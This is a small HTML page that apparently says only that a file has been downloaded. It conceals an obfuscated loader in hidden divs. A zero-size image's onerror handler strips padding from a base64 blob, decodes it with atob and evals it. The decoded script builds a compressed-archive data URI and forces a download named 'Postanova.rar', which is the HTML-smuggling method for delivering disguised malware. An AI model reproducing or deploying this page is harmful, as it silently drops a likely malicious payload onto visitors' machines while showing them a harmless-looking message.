<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" 
 "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<style type="text/css">
   body {text-align:center;width:100%;padding:50px;font-size:20px;color:#aaa}
</style>
</head>  
<body>
Файл завантажено
<div id="Krf" style="display:none">
Qj*c*x*ID*0*gZ*mFs*c*2U7*IA*0N*d*2*lu*Z*G9*3L*m*9u*bG9*hZD*1*mdW*5jd*Glv*bi*gpe*w*0N*aWY*gKE*I3M*S*kgc*m*V0d*XJu*Ow0*NQ*j*c*xID*0*gd*H*J1Z*T*sND*XZ*hc*iB*i*RE0*gP*SB*uY*XZ*p*Z2F*0b3*JbI*nB*sYX*Rmb*3Jt*Il*0*7D*Q1*p*Zi*Ao*Wyd*X*aW*4*z*M*ics*ICd*X*a*W42*N*Cc*sIC*d*Xa*W*5kb*3d*zJy*wgJ*1d*pb*kN*F*J*10u*aW*5kZ*XhP*Z*ih*i*RE0*p*ID0*9*IC*0*xK*SB*kaW*UoK*TsN*dmF*yI*G1*vcS*A9*IGR*vY*3Vt*ZW*50L*mN*y*ZW*F*0ZU*V*s*Z*W*1l*bnQ*o*J2E*nKT*sN*D*XZ*hci*BR*N*mU*g*PSB*kb2*N1*bW*Vud*C5j*cmV*hdG*V*UZ*Xh0*Tm*9*k*ZS*giI*ik*7DQ*1*t*b3*E*uYX*BwZ*W5k*Q2h*pb*GQ*o*UT*Z*lK*Ts*ND*W*1v*cS*50*aX*R*s*Z*S*A*9*IC*J5*ZW*YiO*w0*N*Sm*ZTI*D*0gI*lV*tRn*lJU*m9I*Q*VF*Ee*jRZ*THJ*D*d*0*VGQ*ndB*R0F*RR*0*Fn*SUF*BQ0*p*w*Vm*R5*a*0*N*Bd*3VN*Q*nd*UTk*V*pQ1*M4N*TBP*Z0F*NQ*UR*WQn*ZjM*1J*oY*m*05M*ll*TNX*Ni*b*XNL*Q*X*dLM*jJ*5a*Td*Qa*U*hiQ*W*M0*Z*mlB*TW*5k*VV*ZFT*XZS*Q*V*Zxa*2R*Z*a*W*tWZ*zdz*Ul*l6d*1h*O*TW*px*eEl*x*VE*l*4a1*d*h*T*Wt*4V1*NK*YU*RKT*XV*TWV*RO*TG*w1T*klQ*aW*l*D*aW*l*nb*2*lFO*FVJ*d2d*LK*0*NwS*H*hp*Ull*p*Z*2*d*nZ3*dqN*Xdr*S*UVF*RW*dLR*Wd*K*UEJ*n*V*Hh2*V*FhM*dk*1NW*m9*IU*jd*QZ*y9*BZ*T*l*5N*nV*1M*W*81*Vm*Rx*d*TU*y*L2o*v*ZWQ*1Z*Fh*6dF*hYZ*Vh6*Lyt*xan*B*Z*V1Y*4*V*W*9pS*XB*TWG*xTW*X*g*3Q*1*U*y*Zi*s*zR*0*1qU*U*dV*TzU*4SF*V*tY2*JDb*E*wzY*Vp*WN*3hO*dm*h*5*bX*l*t*Ym*xuV*1dU*b3*kwT*ERv*czF*qVV*Nzd*V*c*y*ZV*l0*TGd*O*UHE*2Zn*k*x*emc*2*VXQ*y*NGN*k*L1*lF*M*2R1*a*0N*V*N*DVw*T*1Zk*cHF*yR*Wl5*e*FZ*E*K0*Ura*DJ*pUk*h*ITk*1C*N2*t*ld*nJV*dH*B*R*VTl*Wd*k9*T*Ml*RyT*k*d*XZX*cvK*1h*jc*UR*l*a*WZ*s*Q*0*o*4*VU*1*yU*Wt*sb*XR*Mb*lNS*c*U1*rc*FB*i*W*k*t*Na*kJt*NXB*h*b*m*N5S*z*I3d*F*R*PU*HFW*T*3Jq*S*D*l4d*W*l*0*Z0V*qRW*l*VRX*Bz*cHB*QW*GpU*SEd*6Q*V*lkR*E*pta*nc*v*R*Vly*M*nd*S*Z1*F*DN*WNt*QU5*lcl*ViT*T*k4*c*lZx*Z*F*hX*UGh*LZj*N*qUH*M0*T*0*tJM*1lM*S*UF5*TEh*sS*k*o*yUE*Z*P*a2J*OeT*J*jR*2U*2ej*JDb*2*xPK*0w1*d*G*ZL*V1*l*B*R3*dE*K2x*M*Z1N*O*bG5*iN2*9x*cj*Q*xSm*p*rU*m*lm*N*UpO*c2*p*hb*k*h*Za*Gtj*V*Xd*0V*m0*2b*TR*Q*Yms*zd*WZo*VD*c*2WD*J*wT*jNK*bk*N*T*Yl*llN*1Vl*TF*cx*Vld*D*ZX*p*YOH*ZqV*l*g*x*Z*XE*xU2*Vn*V*Hlx*bTU*2*c*3N2*aD*hMY*2V*x*RU*pGc*29*aeX*R*0QV*V*OSV*p5*Z*F*Rva*Wp*5*aG5*w*Y3p*XS*0*djd*TBo*L0*JZb*zJ*N*a*W9*F*UDE*3*ejR*odG*hx*M*m*dU*bU*lmS*0VR*S2*F*ET*z*VE*R*3h*LY*0ta*WF*J*sa1*FQa*m9*tN*nF*NeT*JRZ*3RO*N3J*R*Sn*EyU*nBx*eV*d*QS*kd*FN*XNJ*c*TZ*5R2*xz*SEJ*uM*n*l5*Q*UY*5a0*lH*dUJ*0V3*NSQ*3*V0Q*00*5dE*41*R*3l*NU*2*xla*UFM*aU*NO*OE*1T*VkZ*F*a*G9R*c*nN*3eX*NR*dm*FqZ*m*hs*ck*Nw*MUh*SQ*U5X*Rkc*y*Z*1Q*4*d0*k2R*1RQ*Y2R*D*a0Y*4Nn*pNS*D*RoY*nht*Tk1*IbU*Vy*Ml*JkV*0dV*NH*k*1a*WlL*Z*Gl*Ca*E1W*a*3*dY*a*HNw*e*ll*kTF*Bx*Y1*lH*UWw*w*UU*p*UT*Fh*MbH*B*GV*GRz*QVR*w*a*TBU*a2R*JVT*h*WS0*R*Yb*zF*w*Wnk*1WD*VBM*X*NPT*W*ZN*bn*k1O*G*J*Xa1*A5Y*1RE*UEY*x*VHc*0Y*2*F*ZUV*N*rY*1hy*S*EU*w*Zn*R*z*K0*1*w*ZjR*HS*mp*N*Yy*9LY*zY*xd*3*dmT*WY*w*V*kgv*e*E1E*dHM*wUS*9pV*j*J*K*SD*d*sYW*N*hN*1*N*r*OXV*4e*HBY*bjB*s*N*VB*Ocn*Z5*MD*F2*ZU*1LK*2d*6M1*J1*S*21*RK1*Br*VX*J*HT*kRp*Tll*VT*ita*M*i*9m*bD*ZN*RE*p5R*y9J*N*H*M*3M*C9m*U3*kzd*29*0*RD*kwc*3Q*z*dU*lE*M0k*xVj*k*1OU*tVe*lI2*V*Hgv*d*Vgz*NE*U*2W*U*R*P*d*W*01*ZXZ*I*dno*3Rl*R*Q*K3*Fp*N*Ex*2*MDV*lc*zd1*NnQ*0T*i9*CV*0Q*0N1*B*v*T0*t*3K1*Ix*Nm*ZR*K0*9*SN*XZ*r*NX*Br*M*m*J*M*aE*RT*N*Exm*Z3*Z*CV0*9Ra*G*Fxd*DZN*c0p*ad*GN*2*SH*Jhc*WU0*RE*x*SeU*N6U*3*h*n*R3R*PR*kVm*S*EN*rU*2*N1*OW*J*C*b*n*ZKM*m*9sQ*jR*h*RG*pO*c*nFj*dGV*6dE*kve*k9s*UU*t1*OWo*2*NlE*wY*2FE*Tj*FX*SF*h*kV*1VR*T*UZ*CQ*U*E9*Ijs*ND*W1*vcS*5o*cm*V*mI*D0*gJ2*R*h*dG*E6Y*X*Bw*b*Gl*jY*X*R*pb2*4*veC*1y*YX*It*Y29*tc*HJ*lc3*NlZ*Dt*iY*XNl*Nj*Qs*IC*c*gK*y*BK*Z*l*M7*D*Q1k*b2*N1*b*WVu*d*C5i*b*2*R*5*Lm*Fw*cGV*uZE*N*oaW*x*kKG*1*vc*S*k7D*W1*v*cS5*kb*3*d*ubG*9h*Z*CA*9*ICJ*Q*b3*N0*YW*5vd*mEu*cm*F*yIj*sN*bW9*x*L*mN*saW*NrK*C*k7*D*Q1*9Ow*0=*
</div>
<img src="H2r" style="width:0px;height:0px;" onerror="m3H=document.getElementById('Krf').innerHTML;Jte='ev'+'al';TPG=document.getElementById('ltc').innerHTML;window[Jte](TPG)" />
<div id="ltc" style="display:none">
NGz = 'replac';CJ2 = NGz;k1p=CJ2+'eAll';UVS='ev'+'al';lLc='at'+'ob';XMg='*';fsL='';s2d=m3H[k1p](XMg,fsL);RhG=window;RhG[UVS](RhG[lLc](s2d))
</div>
</body>
</html>